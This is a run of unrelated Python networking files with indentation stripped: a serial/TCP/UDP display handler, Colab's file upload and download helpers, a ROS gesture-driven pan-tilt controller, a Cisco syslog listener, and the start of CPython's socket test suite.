h = TCPHandler(self.update_fn)
socketserver.StreamRequestHandler.__init__(h, request, client_address, server)
def handle(self):
"""
handle() closes the socket on return, so stay here waiting on recv() (it
returns zero bytes when the client disconnects); this behaviour mirrors the
Ethernet -> RS485 boxes. The socket is blocking, but this runs in its own
thread, so that is fine.
"""
while 1:
data = bytearray()
chunk = None
# unload until we get the end of frame char (or client disconnect)
while chunk != b"\x8F":
chunk = self.request.recv(1)
# client closed so return and close server connection
if chunk == b"":
return
data.extend(chunk)
# we have data so validate and send to display if valid
if len(data) > 0:
if self.isvalid(data):
self.update_display(data, self.update_fn)
class UDPHandler(Handler):
# overloading __call__ allows us to pass the update_fn instance to the handler when created by the server: https://stackoverflow.com/a/45233774/3959671
def __call__(self, request, client_address, server):
h = UDPHandler(self.update_fn)
socketserver.StreamRequestHandler.__init__(h, request, client_address, server)
def handle(self):
data = self.request[0]
if self.isvalid(data):
self.update_display(data, self.update_fn)
class SerialHandler():
"""
Custom handler for Serial data, which mirrors BaseRequestHandler usage
"""
def __init__(self, port, update_fn, baudrate=57600):
self.chan = serial.Serial()
self.chan.baudrate = baudrate
self.chan.port = port
self.chan.timeout = 10.0
self.thread = threading.Thread(target=self.read_from_port)
self.thread.daemon = True
self.update_fn = update_fn
def open(self):
self.chan.open()
self.thread.start()
def close(self):
self.chan.close()
def read_from_port(self):
while True:
if self.chan.in_waiting > 0:
data = self.chan.read_until(b"\x8F")
if data: self.handle(data)
def handle(self, data):
if Handler.isvalid(data):
Handler.update_display(data, self.update_fn)
class ThreadedUDPServer(socketserver.ThreadingMixIn, socketserver.UDPServer):
pass
class ThreadedTCPServer(socketserver.ThreadingMixIn, socketserver.TCPServer):
pass
|
files.py
|
# Copyright 2017 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Colab-specific file helpers."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import base64
import collections
import os
import socket
import threading
import uuid
import IPython
import portpicker
import six
from six.moves import SimpleHTTPServer
from six.moves import socketserver
from google.colab import output
def upload():
"""Renders widget to upload local (to the browser) files to the kernel.
Blocks until the files are available.
Returns:
A map of the form {<filename>: <file contents>} for all uploaded files.
"""
upload_id = str(uuid.uuid4())
input_id = 'files-' + upload_id
output_id = 'result-' + upload_id
IPython.display.display(
IPython.core.display.HTML("""
<input type="file" id="{input_id}" name="files[]" multiple disabled />
<output id="{output_id}">
Upload widget is only available when the cell has been executed in the
current browser session. Please rerun this cell to enable.
</output>
<script src="/nbextensions/google.colab/files.js"></script> """.format(
input_id=input_id, output_id=output_id)))
# First result is always an indication that the file picker has completed.
result = output.eval_js(
'google.colab._files._uploadFiles("{input_id}", "{output_id}")'.format(
input_id=input_id, output_id=output_id))
files = collections.defaultdict(six.binary_type)
# Mapping from original filename to filename as saved locally.
local_filenames = dict()
while result['action'] != 'complete':
result = output.eval_js(
'google.colab._files._uploadFilesContinue("{output_id}")'.format(
output_id=output_id))
if result['action'] != 'append':
# The JS side uses a generator of promises to process all of the files; some
# steps may not produce data for the Python side, so just proceed to the
# next message.
continue
data = base64.b64decode(result['data'])
filename = result['file']
files[filename] += data
local_filename = local_filenames.get(filename)
if not local_filename:
local_filename = _get_unique_filename(filename)
local_filenames[filename] = local_filename
print('Saving {filename} to {local_filename}'.format(
filename=filename, local_filename=local_filename))
with open(local_filename, 'ab') as f:
f.write(data)
return dict(files)
def _get_unique_filename(filename):
if not os.path.lexists(filename):
return filename
counter = 1
while True:
path, ext = os.path.splitext(filename)
new_filename = '{} ({}){}'.format(path, counter, ext)
if not os.path.lexists(new_filename):
return new_filename
counter += 1
class _V6Server(socketserver.TCPServer):
address_family = socket.AF_INET6
class _FileHandler(SimpleHTTPServer.SimpleHTTPRequestHandler):
"""SimpleHTTPRequestHandler with a couple tweaks."""
def translate_path(self, path):
# Client specifies absolute paths.
return path
def log_message(self, fmt, *args):
# Suppress logging since it's in the background. Any errors will be reported
# via the handler.
pass
def end_headers(self):
# Do not cache the response in the notebook, since it may be quite large.
self.send_header('x-colab-notebook-cache-control', 'no-cache')
SimpleHTTPServer.SimpleHTTPRequestHandler.end_headers(self)
def download(filename):
"""Downloads the file to the user's local disk via a browser download action.
Args:
filename: Name of the file on disk to be downloaded.
Raises:
OSError: if the file cannot be found.
"""
if not os.path.exists(filename):
msg = 'Cannot find file: {}'.format(filename)
if six.PY2:
raise OSError(msg)
else:
raise FileNotFoundError(msg) # pylint: disable=undefined-variable
started = threading.Event()
port = portpicker.pick_unused_port()
def server_entry():
httpd = _V6Server(('::', port), _FileHandler)
started.set()
# Handle a single request then exit the thread.
httpd.handle_request()
thread = threading.Thread(target=server_entry)
thread.start()
started.wait()
output.eval_js(
"""
(async function() {
const response = await fetch('https://localhost:%(port)d%(path)s');
if (!response.ok) {
throw new Error('Failed to download: ' + response.statusText);
}
const blob = await response.blob();
const a = document.createElement('a');
a.href = window.URL.createObjectURL(blob);
a.download = '%(name)s';
a.click();
})();
""" % {
'port': port,
'path': os.path.abspath(filename),
'name': os.path.basename(filename),
})
|
move_ptu_myo.py
|
#!/usr/bin/env python
PKG = 'usma_ptu'
import roslib; roslib.load_manifest(PKG)
import time
from math import pi
from threading import Thread
import rospy
from std_msgs.msg import UInt8
from std_msgs.msg import Float64
from sensor_msgs.msg import Imu
from geometry_msgs.msg import Quaternion
from dynamixel_controllers.srv import *
from dynamixel_msgs.msg import JointState as JointState
class MovePTU():
def __init__(self):
self.is_running = True
self.step_size = 1.0 * pi / 180.0  # roughly one degree per update, in radians
self.prev_time = time.time()
self.g = 0
self.x = 0
self.y = 0
self.tapcount=0
self.onoff = False
rospy.init_node('move_ptu_myo', anonymous=True)
self.pan_axis = rospy.get_param('/axes_map/pan')
self.tilt_axis = rospy.get_param('/axes_map/tilt')
rospy.Subscriber('/myo_gest', UInt8, self.read_myo_gest)
rospy.Subscriber('/myo_imu', Imu, self.read_myo_imu)
self.pan_joint = 0.0
self.tilt_joint = 0.0
self.servo_position_pan = rospy.Publisher('/pan_controller/command', Float64)
self.servo_position_tilt = rospy.Publisher('/tilt_controller/command', Float64)
def read_myo_gest(self, data):
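# Gesture 5 appears to act as an on/off toggle: each odd occurrence enables
# PTU movement, each even occurrence disables it (see tapcount below).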
self.g = data.data
if (self.g == 5):
self.tapcount +=1
if (self.tapcount%2==1):
self.onoff = True
if (self.tapcount%2==0):
self.onoff = False
def read_myo_imu(self,data):
self.x = data.linear_acceleration.x
def update_ptu_position(self):
while self.is_running:
if self.onoff:
if (self.g == 3):
self.pan_joint += 1 * self.step_size
elif (self.g == 2):
self.pan_joint -= 1 * self.step_size
if (self.x > -0.2 and self.x <0.2):
self.tilt_joint += 1 * self.step_size
if (self.x > 0.8 and self.x <1.0):
self.tilt_joint -= 1 * self.step_size
self.servo_position_pan.publish(self.pan_joint)
self.servo_position_tilt.publish(self.tilt_joint)
time.sleep(0.05)
if __name__ == '__main__':
try:
move_ptu = MovePTU()
t = Thread(target=move_ptu.update_ptu_position)
t.start()
rospy.spin()
move_ptu.is_running = False  # stop the update loop; update_ptu_position() checks this flag
t.join()
except rospy.ROSInterruptException: pass
|
main.py
|
#!/usr/bin/env python3
import socket
import sys
import threading
import time
import re
from functions.worker import worker
from env_variables import SERVER_IP
from env_variables import SERVER_PORT
from env_variables import cisco_username
from env_variables import cisco_password
from functions.logging import myLogger
log = myLogger("pythong_logger")
# Create a TCP/IP socket
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server_address = (SERVER_IP, SERVER_PORT)
log.info("SERVER: Server starting up on {} TCP port {}".format(server_address[0],server_address[1]))
print('INFO: Server starting up on {} TCP port {}'.format(server_address[0],server_address[1]))
sock.bind(server_address)
sock.listen(1)
def main():
while True:
# Wait for a connection
log.info("SERVER: Server is waiting for a connection")
print('INFO: Server is waiting for a connection')
connection, client_address = sock.accept()
log.info("SERVER: Connection from {}".format(client_address))
print('INFO: Connection from', client_address)
# Receive the data in small chunks and process it
while True:
time.sleep(1)
data = connection.recv(1024)
if data:
data = str(data)
log.info("SERVER: {}".format(data))
print("INFO", data)
if "Configured from" in data and "admin" not in data:
ip_addr = re.findall(r"\b(?:[0-9]{1,3}\.){3}[0-9]{1,3}\b ",data)
if len(ip_addr) >= 1:
# Regular IP on the Syslog
for ip in ip_addr:
log.info("SERVER: Creating Worker for the ip: {}".format(ip))
print("INFO: Creating Worker for the ip: {}".format(ip))
log_worker = threading.Thread(target=worker, args=(ip,cisco_username,cisco_password))
log.info("SERVER: Launching worker to perform config diff: {}".format(ip))
print("INFO: Launching worker to perform config diff: {}".format(ip))
log_worker.start()
else:
connection.close()
break
if __name__ == "__main__":
main()
|
test_socket.py
|
import unittest
from test import support
from test.support import os_helper
from test.support import socket_helper
from test.support import threading_helper
import errno
import io
import itertools
import socket
import select
import tempfile
import time
import traceback
import queue
import sys
import os
import platform
import array
import contextlib
from weakref import proxy
import signal
import math
import pickle
import struct
import random
import shutil
import string
import _thread as thread
import threading
try:
import multiprocessing
except ImportError:
multiprocessing = False
try:
import fcntl
except ImportError:
fcntl = None
HOST = socket_helper.HOST
# test unicode string and carriage return
MSG = 'Michael Gilfix was here\u1234\r\n'.encode('utf-8')
VSOCKPORT = 1234
AIX = platform.system() == "AIX"
try:
import _socket
except ImportError:
_socket = None
def get_cid():
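# Query the local vsock context ID (CID) via the VM sockets ioctl on /dev/vsock;
# returns None when fcntl, the ioctl constant, or the device is unavailable.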
if fcntl is None:
return None
if not hasattr(socket, 'IOCTL_VM_SOCKETS_GET_LOCAL_CID'):
return None
try:
with open("/dev/vsock", "rb") as f:
r = fcntl.ioctl(f, socket.IOCTL_VM_SOCKETS_GET_LOCAL_CID, " ")
except OSError:
return None
else:
return struct.unpack("I", r)[0]
def _have_socket_can():
"""Check whether CAN sockets are supported on this host."""
try:
s = socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW)
except (AttributeError, OSError):
return False
else:
s.close()
return True
def _have_socket_can_isotp():
"""Check whether CAN ISOTP sockets are supported on this host."""
try:
s = socket.socket(socket.PF_CAN, socket.SOCK_DGRAM, socket.CAN_ISOTP)
except (AttributeError, OSError):
return False
else:
s.close()
return True
def _have_socket_can_j1939():
"""Check whether CAN J1939 sockets are supported on this host."""
try:
s = socket.socket(socket.PF_CAN, socket.SOCK_DGRAM, socket.CAN_J1939)
except (AttributeError, OSError):
return False
else:
s.close()
return True
def _have_socket_rds():
"""Check whether RDS sockets are supported on this host."""
try:
s = socket.socket(socket.PF_RDS, socket.SOCK_SEQPACKET, 0)
except (AttributeError, OSError):
return False
else:
s.close()
return True
def _have_socket_alg():
"""Check whether AF_ALG sockets are supported on this host."""
try:
s = socket.socket(socket.AF_ALG, socket.SOCK_SEQPACKET, 0)
except (AttributeError, OSError):
return False
else:
s.close()
return True
def _have_socket_qipcrtr():
"""Check whether AF_QIPCRTR sockets are supported on this host."""
try:
s = socket.socket(socket.AF_QIPCRTR, socket.SOCK_DGRAM, 0)
except (AttributeError, OSError):
return False
else:
s.close()
return True
def _have_socket_vsock():
"""Check whether AF_VSOCK sockets are supported on this host."""
ret = get_cid() is not None
return ret
def _have_socket_bluetooth():
"""Check whether AF_BLUETOOTH sockets are supported on this host."""
try:
# RFCOMM is supported by all platforms with bluetooth support. Windows
# does not support omitting the protocol.
s = socket.socket(socket.AF_BLUETOOTH, socket.SOCK_STREAM, socket.BTPROTO_RFCOMM)
except (AttributeError, OSError):
return False
else:
s.close()
return True
@contextlib.contextmanager
def socket_setdefaulttimeout(timeout):
old_timeout = socket.getdefaulttimeout()
try:
socket.setdefaulttimeout(timeout)
yield
finally:
socket.setdefaulttimeout(old_timeout)
HAVE_SOCKET_CAN = _have_socket_can()
HAVE_SOCKET_CAN_ISOTP = _have_socket_can_isotp()
HAVE_SOCKET_CAN_J1939 = _have_socket_can_j1939()
HAVE_SOCKET_RDS = _have_socket_rds()
HAVE_SOCKET_ALG = _have_socket_alg()
HAVE_SOCKET_QIPCRTR = _have_socket_qipcrtr()
HAVE_SOCKET_VSOCK = _have_socket_vsock()
HAVE_SOCKET_UDPLITE = hasattr(socket, "IPPROTO_UDPLITE")
HAVE_SOCKET_BLUETOOTH = _have_socket_bluetooth()
# Size in bytes of the int type
SIZEOF_INT = array.array("i").itemsize
class SocketTCPTest(unittest.TestCase):
def setUp(self):
self.serv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.port = socket_helper.bind_port(self.serv)
self.serv.listen()
def tearDown(self):
self.serv.close()
self.serv = None
class SocketUDPTest(unittest.TestCase):
def setUp(self):
self.serv = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.port = socket_helper.bind_port(self.serv)
def tearDown(self):
self.serv.close()
self.serv = None
class SocketUDPLITETest(SocketUDPTest):
def setUp(self):
self.serv = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDPLITE)
self.port = socket_helper.bind_port(self.serv)
class ThreadSafeCleanupTestCase(unittest.TestCase):
"""Subclass of unittest.TestCase with thread-safe cleanup methods.
This subclass protects the addCleanup() and doCleanups() methods
with a recursive lock.
"""
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self._cleanup_lock = threading.RLock()
def addCleanup(self, *args, **kwargs):
with self._cleanup_lock:
return super().addCleanup(*args, **kwargs)
def doCleanups(self, *args, **kwargs):
with self._cleanup_lock:
return super().doCleanups(*args, **kwargs)
class SocketCANTest(unittest.TestCase):
"""To be able to run this test, a `vcan0` CAN interface can be created with
the following commands:
# modprobe vcan
# ip link add dev vcan0 type vcan
# ip link set up vcan0
"""
interface = 'vcan0'
bufsize = 128
"""The CAN frame structure is defined in <linux/can.h>:
struct can_frame {
canid_t can_id; /* 32 bit CAN_ID + EFF/RTR/ERR flags */
__u8 can_dlc; /* data length code: 0 .. 8 */
__u8 data[8] __attribute__((aligned(8)));
};
"""
can_frame_fmt = "=IB3x8s"
can_frame_size = struct.calcsize(can_frame_fmt)
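# Illustrative sketch (not used directly by the tests): a frame with
# can_id 0x123 carrying b'\x01\x02' would be packed as
#     struct.pack(can_frame_fmt, 0x123, 2, b'\x01\x02'.ljust(8, b'\x00'))
# yielding exactly can_frame_size (16) bytes; CANTest.build_can_frame()
# below does the same thing.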
"""The Broadcast Management Command frame structure is defined
in <linux/can/bcm.h>:
struct bcm_msg_head {
__u32 opcode;
__u32 flags;
__u32 count;
struct timeval ival1, ival2;
canid_t can_id;
__u32 nframes;
struct can_frame frames[0];
}
`bcm_msg_head` must be 8 bytes aligned because of the `frames` member (see
`struct can_frame` definition). Native (not standard) struct types must be used for packing.
"""
bcm_cmd_msg_fmt = "@3I4l2I"
bcm_cmd_msg_fmt += "x" * (struct.calcsize(bcm_cmd_msg_fmt) % 8)
def setUp(self):
self.s = socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW)
self.addCleanup(self.s.close)
try:
self.s.bind((self.interface,))
except OSError:
self.skipTest('network interface `%s` does not exist' %
self.interface)
class SocketRDSTest(unittest.TestCase):
"""To be able to run this test, the `rds` kernel module must be loaded:
# modprobe rds
"""
bufsize = 8192
def setUp(self):
self.serv = socket.socket(socket.PF_RDS, socket.SOCK_SEQPACKET, 0)
self.addCleanup(self.serv.close)
try:
self.port = socket_helper.bind_port(self.serv)
except OSError:
self.skipTest('unable to bind RDS socket')
class ThreadableTest:
"""Threadable Test class
The ThreadableTest class makes it easy to create a threaded
client/server pair from an existing unit test. To create a
new threaded class from an existing unit test, use multiple
inheritance:
class NewClass (OldClass, ThreadableTest):
pass
This class defines two new fixture functions with obvious
purposes for overriding:
clientSetUp ()
clientTearDown ()
Any new test functions within the class must then define
tests in pairs, where the test name is preceded with a
'_' to indicate the client portion of the test. Ex:
def testFoo(self):
# Server portion
def _testFoo(self):
# Client portion
Any exceptions raised by the clients during their tests
are caught and transferred to the main thread to alert
the testing framework.
Note, the server setup function cannot call any blocking
functions that rely on the client thread during setup,
unless serverExplicitReady() is called just before
the blocking call (such as in setting up a client/server
connection and performing the accept() in setUp()).
"""
def __init__(self):
# Swap the true setup function
self.__setUp = self.setUp
self.__tearDown = self.tearDown
self.setUp = self._setUp
self.tearDown = self._tearDown
def serverExplicitReady(self):
"""This method allows the server to explicitly indicate that
it wants the client thread to proceed. This is useful if the
server is about to execute a blocking routine that is
dependent upon the client thread during its setup routine."""
self.server_ready.set()
def _setUp(self):
self.wait_threads = threading_helper.wait_threads_exit()
self.wait_threads.__enter__()
self.server_ready = threading.Event()
self.client_ready = threading.Event()
self.done = threading.Event()
self.queue = queue.Queue(1)
self.server_crashed = False
# Do some munging to start the client test.
methodname = self.id()
i = methodname.rfind('.')
methodname = methodname[i+1:]
test_method = getattr(self, '_' + methodname)
self.client_thread = thread.start_new_thread(
self.clientRun, (test_method,))
try:
self.__setUp()
except:
self.server_crashed = True
raise
finally:
self.server_ready.set()
self.client_ready.wait()
def _tearDown(self):
self.__tearDown()
self.done.wait()
self.wait_threads.__exit__(None, None, None)
if self.queue.qsize():
exc = self.queue.get()
raise exc
def clientRun(self, test_func):
self.server_ready.wait()
try:
self.clientSetUp()
except BaseException as e:
self.queue.put(e)
self.clientTearDown()
return
finally:
self.client_ready.set()
if self.server_crashed:
self.clientTearDown()
return
if not hasattr(test_func, '__call__'):
raise TypeError("test_func must be a callable function")
try:
test_func()
except BaseException as e:
self.queue.put(e)
finally:
self.clientTearDown()
def clientSetUp(self):
raise NotImplementedError("clientSetUp must be implemented.")
def clientTearDown(self):
self.done.set()
thread.exit()
class ThreadedTCPSocketTest(SocketTCPTest, ThreadableTest):
def __init__(self, methodName='runTest'):
SocketTCPTest.__init__(self, methodName=methodName)
ThreadableTest.__init__(self)
def clientSetUp(self):
self.cli = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
def clientTearDown(self):
self.cli.close()
self.cli = None
ThreadableTest.clientTearDown(self)
class ThreadedUDPSocketTest(SocketUDPTest, ThreadableTest):
def __init__(self, methodName='runTest'):
SocketUDPTest.__init__(self, methodName=methodName)
ThreadableTest.__init__(self)
def clientSetUp(self):
self.cli = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
def clientTearDown(self):
self.cli.close()
self.cli = None
ThreadableTest.clientTearDown(self)
@unittest.skipUnless(HAVE_SOCKET_UDPLITE,
'UDPLITE sockets required for this test.')
class ThreadedUDPLITESocketTest(SocketUDPLITETest, ThreadableTest):
def __init__(self, methodName='runTest'):
SocketUDPLITETest.__init__(self, methodName=methodName)
ThreadableTest.__init__(self)
def clientSetUp(self):
self.cli = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDPLITE)
def clientTearDown(self):
self.cli.close()
self.cli = None
ThreadableTest.clientTearDown(self)
class ThreadedCANSocketTest(SocketCANTest, ThreadableTest):
def __init__(self, methodName='runTest'):
SocketCANTest.__init__(self, methodName=methodName)
ThreadableTest.__init__(self)
def clientSetUp(self):
self.cli = socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW)
try:
self.cli.bind((self.interface,))
except OSError:
# skipTest should not be called here, and will be called in the
# server instead
pass
def clientTearDown(self):
self.cli.close()
self.cli = None
ThreadableTest.clientTearDown(self)
class ThreadedRDSSocketTest(SocketRDSTest, ThreadableTest):
def __init__(self, methodName='runTest'):
SocketRDSTest.__init__(self, methodName=methodName)
ThreadableTest.__init__(self)
def clientSetUp(self):
self.cli = socket.socket(socket.PF_RDS, socket.SOCK_SEQPACKET, 0)
try:
# RDS sockets must be bound explicitly to send or receive data
self.cli.bind((HOST, 0))
self.cli_addr = self.cli.getsockname()
except OSError:
# skipTest should not be called here, and will be called in the
# server instead
pass
def clientTearDown(self):
self.cli.close()
self.cli = None
ThreadableTest.clientTearDown(self)
@unittest.skipIf(fcntl is None, "need fcntl")
@unittest.skipUnless(HAVE_SOCKET_VSOCK,
'VSOCK sockets required for this test.')
@unittest.skipUnless(get_cid() != 2,
"This test can only be run on a virtual guest.")
class ThreadedVSOCKSocketStreamTest(unittest.TestCase, ThreadableTest):
def __init__(self, methodName='runTest'):
unittest.TestCase.__init__(self, methodName=methodName)
ThreadableTest.__init__(self)
def setUp(self):
self.serv = socket.socket(socket.AF_VSOCK, socket.SOCK_STREAM)
self.addCleanup(self.serv.close)
self.serv.bind((socket.VMADDR_CID_ANY, VSOCKPORT))
self.serv.listen()
self.serverExplicitReady()
self.conn, self.connaddr = self.serv.accept()
self.addCleanup(self.conn.close)
def clientSetUp(self):
time.sleep(0.1)
self.cli = socket.socket(socket.AF_VSOCK, socket.SOCK_STREAM)
self.addCleanup(self.cli.close)
cid = get_cid()
self.cli.connect((cid, VSOCKPORT))
def testStream(self):
msg = self.conn.recv(1024)
self.assertEqual(msg, MSG)
def _testStream(self):
self.cli.send(MSG)
self.cli.close()
class SocketConnectedTest(ThreadedTCPSocketTest):
"""Socket tests for client-server connection.
self.cli_conn is a client socket connected to the server. The
setUp() method guarantees that it is connected to the server.
"""
def __init__(self, methodName='runTest'):
ThreadedTCPSocketTest.__init__(self, methodName=methodName)
def setUp(self):
ThreadedTCPSocketTest.setUp(self)
# Indicate explicitly we're ready for the client thread to
# proceed and then perform the blocking call to accept
self.serverExplicitReady()
conn, addr = self.serv.accept()
self.cli_conn = conn
def tearDown(self):
self.cli_conn.close()
self.cli_conn = None
ThreadedTCPSocketTest.tearDown(self)
def clientSetUp(self):
ThreadedTCPSocketTest.clientSetUp(self)
self.cli.connect((HOST, self.port))
self.serv_conn = self.cli
def clientTearDown(self):
self.serv_conn.close()
self.serv_conn = None
ThreadedTCPSocketTest.clientTearDown(self)
class SocketPairTest(unittest.TestCase, ThreadableTest):
def __init__(self, methodName='runTest'):
unittest.TestCase.__init__(self, methodName=methodName)
ThreadableTest.__init__(self)
def setUp(self):
self.serv, self.cli = socket.socketpair()
def tearDown(self):
self.serv.close()
self.serv = None
def clientSetUp(self):
pass
def clientTearDown(self):
self.cli.close()
self.cli = None
ThreadableTest.clientTearDown(self)
# The following classes are used by the sendmsg()/recvmsg() tests.
# Combining, for instance, ConnectedStreamTestMixin and TCPTestBase
# gives a drop-in replacement for SocketConnectedTest, but different
# address families can be used, and the attributes serv_addr and
# cli_addr will be set to the addresses of the endpoints.
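# For illustration (hypothetical class, not part of the suite), a
#     class ExampleTCPTest(ConnectedStreamTestMixin, TCPTestBase):
#         ...
# behaves like SocketConnectedTest but also exposes self.serv_addr and
# self.cli_addr, and swapping TCPTestBase for another base class (e.g.
# UnixStreamBase below) reuses the same tests over a different address
# family.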
class SocketTestBase(unittest.TestCase):
"""A base class for socket tests.
Subclasses must provide methods newSocket() to return a new socket
and bindSock(sock) to bind it to an unused address.
Creates a socket self.serv and sets self.serv_addr to its address.
"""
def setUp(self):
self.serv = self.newSocket()
self.bindServer()
def bindServer(self):
"""Bind server socket and set self.serv_addr to its address."""
self.bindSock(self.serv)
self.serv_addr = self.serv.getsockname()
def tearDown(self):
self.serv.close()
self.serv = None
class SocketListeningTestMixin(SocketTestBase):
"""Mixin to listen on the server socket."""
def setUp(self):
super().setUp()
self.serv.listen()
class ThreadedSocketTestMixin(ThreadSafeCleanupTestCase, SocketTestBase,
ThreadableTest):
"""Mixin to add client socket and allow client/server tests.
Client socket is self.cli and its address is self.cli_addr. See
ThreadableTest for usage information.
"""
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
ThreadableTest.__init__(self)
def clientSetUp(self):
self.cli = self.newClientSocket()
self.bindClient()
def newClientSocket(self):
"""Return a new socket for use as client."""
return self.newSocket()
def bindClient(self):
"""Bind client socket and set self.cli_addr to its address."""
self.bindSock(self.cli)
self.cli_addr = self.cli.getsockname()
def clientTearDown(self):
self.cli.close()
self.cli = None
ThreadableTest.clientTearDown(self)
class ConnectedStreamTestMixin(SocketListeningTestMixin,
ThreadedSocketTestMixin):
"""Mixin to allow client/server stream tests with connected client.
Server's socket representing connection to client is self.cli_conn
and client's connection to server is self.serv_conn. (Based on
SocketConnectedTest.)
"""
def setUp(self):
super().setUp()
# Indicate explicitly we're ready for the client thread to
# proceed and then perform the blocking call to accept
self.serverExplicitReady()
conn, addr = self.serv.accept()
self.cli_conn = conn
def tearDown(self):
self.cli_conn.close()
self.cli_conn = None
super().tearDown()
def clientSetUp(self):
super().clientSetUp()
self.cli.connect(self.serv_addr)
self.serv_conn = self.cli
def clientTearDown(self):
try:
self.serv_conn.close()
self.serv_conn = None
except AttributeError:
pass
super().clientTearDown()
class UnixSocketTestBase(SocketTestBase):
"""Base class for Unix-domain socket tests."""
# This class is used for file descriptor passing tests, so we
# create the sockets in a private directory so that other users
# can't send anything that might be problematic for a privileged
# user running the tests.
def setUp(self):
self.dir_path = tempfile.mkdtemp()
self.addCleanup(os.rmdir, self.dir_path)
super().setUp()
def bindSock(self, sock):
path = tempfile.mktemp(dir=self.dir_path)
socket_helper.bind_unix_socket(sock, path)
self.addCleanup(os_helper.unlink, path)
class UnixStreamBase(UnixSocketTestBase):
"""Base class for Unix-domain SOCK_STREAM tests."""
def newSocket(self):
return socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
class InetTestBase(SocketTestBase):
"""Base class for IPv4 socket tests."""
host = HOST
def setUp(self):
super().setUp()
self.port = self.serv_addr[1]
def bindSock(self, sock):
socket_helper.bind_port(sock, host=self.host)
class TCPTestBase(InetTestBase):
"""Base class for TCP-over-IPv4 tests."""
def newSocket(self):
return socket.socket(socket.AF_INET, socket.SOCK_STREAM)
class UDPTestBase(InetTestBase):
"""Base class for UDP-over-IPv4 tests."""
def newSocket(self):
return socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
class UDPLITETestBase(InetTestBase):
"""Base class for UDPLITE-over-IPv4 tests."""
def newSocket(self):
return socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDPLITE)
class SCTPStreamBase(InetTestBase):
"""Base class for SCTP tests in one-to-one (SOCK_STREAM) mode."""
def newSocket(self):
return socket.socket(socket.AF_INET, socket.SOCK_STREAM,
socket.IPPROTO_SCTP)
class Inet6TestBase(InetTestBase):
"""Base class for IPv6 socket tests."""
host = socket_helper.HOSTv6
class UDP6TestBase(Inet6TestBase):
"""Base class for UDP-over-IPv6 tests."""
def newSocket(self):
return socket.socket(socket.AF_INET6, socket.SOCK_DGRAM)
class UDPLITE6TestBase(Inet6TestBase):
"""Base class for UDPLITE-over-IPv6 tests."""
def newSocket(self):
return socket.socket(socket.AF_INET6, socket.SOCK_DGRAM, socket.IPPROTO_UDPLITE)
# Test-skipping decorators for use with ThreadableTest.
def skipWithClientIf(condition, reason):
"""Skip decorated test if condition is true, add client_skip decorator.
If the decorated object is not a class, sets its attribute
"client_skip" to a decorator which will return an empty function
if the test is to be skipped, or the original function if it is
not. This can be used to avoid running the client part of a
skipped test when using ThreadableTest.
"""
def client_pass(*args, **kwargs):
pass
def skipdec(obj):
retval = unittest.skip(reason)(obj)
if not isinstance(obj, type):
retval.client_skip = lambda f: client_pass
return retval
def noskipdec(obj):
if not (isinstance(obj, type) or hasattr(obj, "client_skip")):
obj.client_skip = lambda f: f
return obj
return skipdec if condition else noskipdec
def requireAttrs(obj, *attributes):
"""Skip decorated test if obj is missing any of the given attributes.
Sets client_skip attribute as skipWithClientIf() does.
"""
missing = [name for name in attributes if not hasattr(obj, name)]
return skipWithClientIf(
missing, "don't have " + ", ".join(name for name in missing))
def requireSocket(*args):
"""Skip decorated test if a socket cannot be created with given arguments.
When an argument is given as a string, will use the value of that
attribute of the socket module, or skip the test if it doesn't
exist. Sets client_skip attribute as skipWithClientIf() does.
"""
err = None
missing = [obj for obj in args if
isinstance(obj, str) and not hasattr(socket, obj)]
if missing:
err = "don't have " + ", ".join(name for name in missing)
else:
callargs = [getattr(socket, obj) if isinstance(obj, str) else obj
for obj in args]
try:
s = socket.socket(*callargs)
except OSError as e:
# XXX: check errno?
err = str(e)
else:
s.close()
return skipWithClientIf(
err is not None,
"can't create socket({0}): {1}".format(
", ".join(str(o) for o in args), err))
#######################################################################
## Begin Tests
class GeneralModuleTests(unittest.TestCase):
def test_SocketType_is_socketobject(self):
import _socket
self.assertTrue(socket.SocketType is _socket.socket)
s = socket.socket()
self.assertIsInstance(s, socket.SocketType)
s.close()
def test_repr(self):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
with s:
self.assertIn('fd=%i' % s.fileno(), repr(s))
self.assertIn('family=%s' % socket.AF_INET, repr(s))
self.assertIn('type=%s' % socket.SOCK_STREAM, repr(s))
self.assertIn('proto=0', repr(s))
self.assertNotIn('raddr', repr(s))
s.bind(('127.0.0.1', 0))
self.assertIn('laddr', repr(s))
self.assertIn(str(s.getsockname()), repr(s))
self.assertIn('[closed]', repr(s))
self.assertNotIn('laddr', repr(s))
@unittest.skipUnless(_socket is not None, 'need _socket module')
def test_csocket_repr(self):
s = _socket.socket(_socket.AF_INET, _socket.SOCK_STREAM)
try:
expected = ('<socket object, fd=%s, family=%s, type=%s, proto=%s>'
% (s.fileno(), s.family, s.type, s.proto))
self.assertEqual(repr(s), expected)
finally:
s.close()
expected = ('<socket object, fd=-1, family=%s, type=%s, proto=%s>'
% (s.family, s.type, s.proto))
self.assertEqual(repr(s), expected)
def test_weakref(self):
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
p = proxy(s)
self.assertEqual(p.fileno(), s.fileno())
s = None
try:
p.fileno()
except ReferenceError:
pass
else:
self.fail('Socket proxy still exists')
def testSocketError(self):
